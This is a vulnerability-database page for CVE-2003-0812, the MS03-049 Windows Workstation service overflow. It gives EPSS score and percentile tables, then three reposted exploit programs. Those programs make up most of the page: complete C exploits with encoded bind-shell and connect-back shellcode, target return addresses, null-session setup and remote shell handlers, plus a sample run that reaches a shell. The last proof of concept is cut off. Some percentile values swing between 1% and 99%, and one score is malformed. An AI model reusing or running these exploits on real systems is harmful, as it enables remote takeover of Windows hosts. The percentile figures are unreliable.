CVE-2003-0812 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	91.86%	–	–
2023-03-12	–	–	–	96.75%	–
2023-05-28	–	–	–	96.96%	–
2024-04-28	–	–	–	96.9%	–
2024-06-02	–	–	–	96.9%	–
2024-09-15	–	–	–	96.86%	–
2024-12-22	–	–	–	95.82%	–
2025-01-19	–	–	–	95.82%	–
2025-03-18	–	–	–	–	84.71%
2025-03-30	–	–	–	–	85.32%
2025-03-30	–	–	–	–	85.32,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-05-28	1%
2024-04-28	1%
2024-06-02	1%
2024-09-15	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

/* * Author: snooq * Date: 14 November 2003 * * +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++ * * This is just slightly better than the one I posted to * packetstorm.... * * The public version will crash 'services.exe' immediately * while this one crash it only when u exit from shell.... * * I'm still trying to figure out a way to avoid the 'crash' * all together... any ideas???? * * Let me know if you hav trouble compiling this shit... * I hope this could be a good e.g for u to try Win32 * exploitation.. * * This code is crappy... if u know of a better way of doing * things... pls tell me....... * * Otherwise, if you guys r keen... I'll be more than happy * to go thru this in details wif u all... Meanwhile..enjoy! * * +++++++++++++++++++++++++++++++++++++++++++++++++ */ #pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib") #pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib") #pragma comment (linker,"/NODEFAULTLIB:libcmt.lib") #pragma comment (linker,"/NODEFAULTLIB:libcd.lib") #pragma comment (lib,"ws2_32") #pragma comment (lib,"msvcrt") #pragma comment (lib,"mpr") #pragma warning (disable:4013) #include <winsock2.h> #include <windows.h> #include <process.h> #include <stdlib.h> #include <stdio.h> #include <lm.h> #define NOP 0x90 #define PORT 24876 #define KEY 0x99999999 #define ALIGN 1 // Between 0 ~ 3 #define TARGET 1 #define INTERVAL 3 #define TIME_OUT 20 #define PORT_OFFSET_1 198 #define PORT_OFFSET_2 193 #define IP_OFFSET 186 #define SC_OFFSET 20 // Gap for some NOPs... #define RET_SIZE 2026 // Big enuff to take EIP... ;) #define SC_SIZE_1 sizeof(bindport) #define SC_SIZE_2 sizeof(connback) #define BSIZE 2600 #define SSIZE 128 extern char getopt(int,char **,char*); extern char *optarg; static int alarm_fired=0; HMODULE hMod; FARPROC fxn; HANDLE t1, t2; char buff[BSIZE]; struct { char *os; long jmpesp; char *dll; } targets[] = { { "Window 2000 (en) SP4", 0x77e14c29, "user32.dll 5.0.2195.6688" }, { "Window 2000 (en) SP1", 0x77e3cb4c, "user32.dll 5.0.2195.1600" }, { "For debugging only", 0x41424344, "dummy.dll 5.0.2195.1600" } }, v; /* * HD Moore's shellcode..... ;) */ char bindport[]= "\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99" "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f" "\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65" "\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a" "\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10" "\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85" "\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0" "\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f" "\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17" "\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66" "\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8" "\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc" "\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18" "\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f" "\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5" "\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0" "\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66" "\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce" "\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81" "\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65" "\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5" "\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85" "\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4" "\xc2\x5b\x91\x99"; char connback[]= "\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99" "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33" "\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b" "\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7" "\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd" "\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce" "\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3" "\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71" "\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09" "\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce" "\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b" "\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd" "\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67" "\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14" "\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99" "\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd" "\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12" "\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72" "\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79" "\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12" "\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12" "\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09"; void err_exit(char *s) { printf("%s\n",s); exit(0); } /* * Ripped from TESO code and modifed by ey4s for win32 * and... lamer quoted it wholesale here..... =p */ void doshell(int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec=1; time.tv_usec=0; while (1) { ul[0]=1; ul[1]=sock; l=select(0,(fd_set *)&ul,NULL,NULL,&time); if(l==1) { l=recv(sock,buf,sizeof(buf),0); if (l<=0) { err_exit("-> Connection closed...\n"); } l=write(1,buf,l); if (l<=0) { err_exit("-> Connection closed...\n"); } } else { l=read(0,buf,sizeof(buf)); if (l<=0) { err_exit("-> Connection closed...\n"); } l=send(sock,buf,l,0); if (l<=0) { err_exit("-> Connection closed...\n"); } } } } void changeip(char *ip) { char *ptr; ptr=connback+IP_OFFSET; /* Assume Little-Endianess.... */ *((long *)ptr)=inet_addr(ip)^KEY; } void changeport(char *code, int port, int offset) { char *ptr; ptr=code+offset; port^=KEY; /* Assume Little-Endianess.... */ *ptr++=(char)((port>>8)&0xff); *ptr++=(char)(port&0xff); } void banner() { printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n"); } void usage(char *s) { banner(); printf("Usage: %s [options]\n",s); printf("\t-r\tSize of 'return addresses'\n"); printf("\t-a\tAlignment size [0~3]\n"); printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n"); printf("\t\tPort for shell to connect back (in 'listening' mode)\n"); printf("\t-s\tShellcode offset from the return address\n"); printf("\t-h\tTarget's IP\n"); printf("\t-t\tTarget types. ( -H for more info )\n"); printf("\t-H\tShow list of possible targets\n"); printf("\t-l\tListening for shell connecting\n"); printf("\t\tback to port specified by '-p' switch\n"); printf("\t-i\tIP for shell to connect back\n"); printf("\t-I\tTime interval between each trial ('connecting' mode only)\n"); printf("\t-T\tTime out (in number of seconds)\n\n"); printf("\tNotes:\n\t======\n\t'-h' is mandatory\n"); printf("\t'-i' is mandatory if '-l' is specified\n\n"); exit(0); } void showtargets() { int i; banner(); printf("Possible targets are:\n"); printf("=====================\n"); for (i=0;i<sizeof(targets)/sizeof(v);i++) { printf("%d) %s",i+1,targets[i].os); printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll); } exit(0); } void sendstr(char *host) { WCHAR wStr[128]; char ipc[128], hStr[128]; DWORD ret; NETRESOURCE NET; hMod=LoadLibrary("netapi32.dll"); fxn=GetProcAddress(hMod,"NetValidateName"); _snprintf(ipc,127,"\\\\%s\\ipc$",host); _snprintf(hStr,127,"\\\\%s",host); MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0])); NET.lpLocalName = NULL; NET.lpProvider = NULL; NET.dwType = RESOURCETYPE_ANY; NET.lpRemoteName = (char*)&ipc; printf("-> Setting up $IPC session...(aka 'null session')\n"); ret=WNetAddConnection2(&NET,"","",0); if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); } else printf("-> IPC$ session setup successfully...\n"); printf("-> Sending exploit string...\n"); ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0); } VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) { err_exit("-> I give up...dude....."); } void setalarm(int timeout) { MSG msg = { 0, 0, 0, 0 }; SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell); while(!alarm_fired) { if (GetMessage(&msg, 0, 0, 0) ) { if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n"); DispatchMessage(&msg); } } } void resetalarm() { if (TerminateThread(t2,0)==0) { err_exit("-> Failed to reset alarm..."); } if (TerminateThread(t1,0)==0) { err_exit("-> Failed to kill the 'sending' thread..."); } } void do_send(char *host,int timeout) { t1=(HANDLE)_beginthread(sendstr,0,host); if (t1==0) { err_exit("-> Failed to send exploit string..."); } t2=(HANDLE)_beginthread(setalarm,0,timeout); if (t2==0) { err_exit("-> Failed to set alarm clock..."); } } int main(int argc, char *argv[]) { char opt; char *host, *ptr, *ip=""; struct sockaddr_in sockadd; int i, i_len, ok=0, mode=0, flag=0; int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET; int target=TARGET, scsize=SC_SIZE_1, port=PORT; int timeout=TIME_OUT, interval=INTERVAL; long retaddr; WSADATA wsd; SOCKET s1, s2; if (argc<2) { usage(argv[0]); } while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) { switch(opt) { case 'a': align=atoi(optarg); break; case 'I': interval=atoi(optarg); break; case 'T': timeout=atoi(optarg); break; case 't': target=atoi(optarg); retaddr=targets[target-1].jmpesp; break; case 'i': ip=optarg; changeip(ip); break; case 'l': mode=1; scsize=SC_SIZE_2; break; case 'r': retsize=atoi(optarg); break; case 's': sc_offset=atoi(optarg); break; case 'h': ok=1; host=optarg; sockadd.sin_addr.s_addr=inet_addr(optarg); break; case 'p': port=atoi(optarg); break; case 'H': showtargets(); break; default: usage(argv[0]); break; } } if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); } memset(buff,NOP,BSIZE); ptr=buff+align; for(i=0;i<retsize;i+=4) { *((long *)ptr)=retaddr; ptr+=4; } if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) { err_exit("-> WSAStartup error...."); } if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { err_exit("-> socket() error..."); } sockadd.sin_family=AF_INET; sockadd.sin_port=htons((SHORT)port); ptr=buff+retsize+sc_offset; if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'.."); banner(); if (mode) { printf("-> 'Listening' mode...( port: %d )\n",port); changeport(connback, port, PORT_OFFSET_2); for(i=0;i<scsize;i++) { *ptr++=connback[i]; } do_send(host,timeout); Sleep(1000); sockadd.sin_addr.s_addr=htonl(INADDR_ANY); i_len=sizeof(sockadd); if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) { err_exit("-> bind() error"); } if (listen(s1,0)<0) { err_exit("-> listen() error"); } printf("-> Waiting for connection...\n"); s2=accept(s1,(struct sockaddr *)&sockadd,&i_len); if (s2<0) { err_exit("-> accept() error"); } printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr)); resetalarm(); doshell(s2); } else { printf("-> 'Connecting' mode...\n",port); changeport(bindport, port, PORT_OFFSET_1); for(i=0;i<scsize;i++) { *ptr++=bindport[i]; } do_send(host,timeout); Sleep(1000); printf("-> Will try connecting to shell now....\n"); i=0; while(!flag) { Sleep(interval*1000); if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { printf("-> Trial #%d....\n",i++); } else { flag=1; } } printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port); resetalarm(); doshell(s1); } return 0; } // milw0rm.com [2003-11-14]

/* To build new netapi32.lib pedump /exp netapi32.dll > netapi32.exp buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll d:\>rpc_wks_bo.exe WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1 ------------------------------------------------------------------- Usage: rpc_wks_bo.exe [-ht] -h <IP> : Target IP -t <Type> : Target type (-t0 for a list) d:\>rpc_wks_bo.exe -t0 Possible targets are: ============================ 1) Window XP Pro + SP0 [Rus] 2) Window XP Pro + SP1 [Rus] 3) Crash all d:\>rpc_wks_bo.exe -h 192.168.100.7 -t1 [+] Prepare exploit string [+] Sleep at 2s ... [+] Setting up IPC$ session... [+] IPC$ session setup successfully! [+] Sending exploit ... [+] Initialize WSAStartup - OK [+] Socket initialized - OK [+] Try connecting to 192.168.100.7:9191 ... [*] Connected to shell at 192.168.100.7:9191 Microsoft Windows XP [Âåðñèÿ 5.1.2600] (Ñ) Êîðïîðàöèÿ Ìàéêðîñîôò, 1985-2001. C:\WINDOWS\system32> */ /**************** Public version *****************/ #include <stdio.h> #include <io.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <windows.h> #include <process.h> #pragma lib <ws2_32.lib> #pragma lib <netapi32.lib> #pragma lib <mpr.lib> #define RECVTIMEOUT 1 #define VER "0.1.4" extern char getopt(int,char **,char*); extern char *optarg; // ------------------------------------------------ void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount, wchar_t *DomainAccountPassword, unsigned int Reserved); void send_exp(); // ----------Lamers buff =) ---------------------------- char expl[3000]; wchar_t expl_uni[6000]; char tgt_net[30]; wchar_t tgt_net_uni[60]; char ipc[30]; // ----------------------------------------------------- struct { char *os; long jmpesp; } targets[] = { { "Window XP + SP0 [Rus] ", 0x77f5801c }, // 0x77d6754a(user32.dll) { "Window XP + SP0 + Rollup [Rus] ", 0x77f98db7 }, //0x77d639ab-work 0x77fb59cc - sp1 { "Window XP + SP1 [Rus] ", 0x77fb59cc }, { "Window XP + SP1 + Rollup [Rus] ", 0x77f9980f }, // 0x77d637db(user32.dll) { "Crash all ", 0x41424344 } }, tgt_type; unsigned char shellcode[] = // bind shell at 9191 port (484 bytes) // ripped =) "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33" "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C" "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE" "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB" "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77" "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77" "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77" "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77" "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77" "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77" "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77" "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77" "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77" "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB" "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C" "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0" "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77" "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0" "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB" "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5" "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98" "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE" "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77" "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8" "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF" "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90" "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74" "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4" "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94" "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5" "\xD3\x4A\x8C\x88"; /***************************************************************/ void banner() { printf("\nWKS service remote exploit by fiNis (fiNis[at]bk[dot]ru), ver:%s\n",VER); printf( "-------------------------------------------------------------------\n"); } void showtargets() { int i; printf("Possible targets are:\n"); printf("============================\n"); for (i=0;i<sizeof(targets)/sizeof(tgt_type);i++) { printf("%d) %s\n",i+1,targets[i].os); } exit(1); } void usage(char *prog) { banner(); printf("Usage: %s [-ht]\n", prog); printf("\t-h <IP> : Target IP\n"); printf("\t-t <Type> : Target type (-t0 for a list)\n"); exit(1); } /***************************************************************/ long gimmeip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname); WSACleanup(); exit(1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } // ************************************* CMD ***************************** /* * Ripped from TESO code and modifed by ey4s for win32 */ void cmdshell2(int sock) { int l; char buf[1000]; struct timeval time; unsigned long ul[2]; time.tv_sec=RECVTIMEOUT; time.tv_usec=0; while (1) { ul[0]=1; ul[1]=sock; l=select(0,(fd_set *)&ul,NULL,NULL,&time); if(l==1) { l=recv(sock,buf,sizeof(buf),0); if (l<=0) { printf("[x] Connection closed.\n"); return; } l=write(1,buf,l); if (l<=0) { printf("[x] Connection closed.\n"); return; } } else { l=read(0,buf,sizeof(buf)); if (l<=0) { printf("[x] Connection closed.\n"); return; } l=send(sock,buf,l,0); if (l<=0) { printf("[x] Connection closed.\n"); return; } } } } /****************************************************************/ void send_exp() { NETRESOURCE _IPC_; _IPC_.lpLocalName = NULL; _IPC_.lpProvider = NULL; _IPC_.dwType = RESOURCETYPE_ANY; _IPC_.lpRemoteName = (char*)&ipc; printf("[+] Setting up IPC$ session...\n"); if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) { printf("[x] Couldn't establish IPC$ connection.\n"); exit (1); } printf("[*] IPC$ session setup successfully!\n"); printf("[+] Sending exploit ...\n"); NetAddAlternateComputerName(tgt_net_uni, expl_uni ,NULL,NULL,0); // ka-a-a b0-0-0-ms // } // *************************************************************** int main(int argc,char *argv[]) { WSADATA wsdata; int sock; unsigned short port = 9191; struct sockaddr_in target; unsigned long ip; char opt; int tgt_type = 0; char *tgt_host; if (argc<2) { usage(argv[0]); } while((opt = getopt(argc,argv,"h:t:v"))!=EOF) { switch(opt) { case 'h': tgt_host = optarg; snprintf(tgt_net,127, "\\\\%s", optarg); snprintf(ipc,127, "\\\\%s\\ipc$", optarg); break; case 't': tgt_type = atoi(optarg); if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) { showtargets(); } break; default: usage(argv[0]); break; } } printf("\n[+] Prepare exploit string\n"); memset(expl, 0x00, sizeof(expl)); memset(expl, 0x41, 2064); memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4); //memcpy(&expl[2044], "BBBB", 4); memcpy(&expl[2064], shellcode, sizeof(shellcode)); // begin shellcode here memset(expl_uni, 0x00, sizeof(expl_uni)); memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni)); mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net)); switch(tgt_type) { case 1: case 3: MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni)); // MultiByteToWideChar - 100 % work at XP+SP0+Rollup break; case 2: mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1 break; default: mbstowcs(expl_uni, expl, sizeof(expl)); break; } beginthread(send_exp,0,NULL); printf("[+] Sleep at 2s ... \n"); sleep(2000); if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) { printf("[x] WSAStartup error...\n"); WSACleanup(); return 1; } printf("[+] Initialize WSAStartup - OK\n"); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { printf("[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Socket initialized - OK\n"); ip=gimmeip(tgt_host); memset(&target, 0, sizeof(target)); target.sin_family=AF_INET; target.sin_addr.s_addr = ip; target.sin_port=htons(port); printf("[+] Try connecting to %s:%d ...\n",tgt_host,port); if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) { printf("\n[x] Exploit failed or is Filtred. Exiting...\n"); WSACleanup(); exit(1); } printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port); cmdshell2(sock); closesocket(sock); WSACleanup(); return 0; } // milw0rm.com [2003-12-04]

/* Proof of concept for MS03-049. This code was tested on a Win2K SP4 with FAT32 file system, and is supposed to work *only* with that (it will probably crash the the other 2Ks, no clue about XPs). To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve this public version, do not bother to ask. Credits go to eEye See original bulletin for more information, it is very well documented. */ #include <stdio.h> #include <win.h> #include <string.h> typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG); #define SIZE 2048 // PEX generated port binding shellcode (5555) unsigned char shellcode[] = "\x66\x81\xec\x04\x07" // sub sp, 704h "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31" "\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc" "\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25" "\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b" "\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b" "\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17" "\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25" "\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d" "\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d" "\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76" "\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda" "\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72" "\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d" "\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda" "\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8" "\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61" "\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75" "\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50" "\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70" "\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d" "\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24" "\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d" "\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4" "\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21" "\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25"; unsigned char jmp[] = "\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload int main(void) { int ret; HINSTANCE hInstance; MYPROC procAddress; char szBuffer[SIZE]; NETRESOURCE netResource; netResource.lpLocalName = NULL; netResource.lpProvider = NULL; netResource.dwType = RESOURCETYPE_ANY; netResource.lpRemoteName = "\\\\192.168.175.3\\ipc$"; ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session if (ret != 0) { fprintf(stderr, "[-] WNetAddConnection2 failed\n"); return 1; } hInstance = LoadLibrary("netapi32"); if (hInstance == NULL) { fprintf(stderr, "[-] LoadLibrary failed\n"); return 1; } procAddress = (MYPROC)GetProcAddress(hInstance, 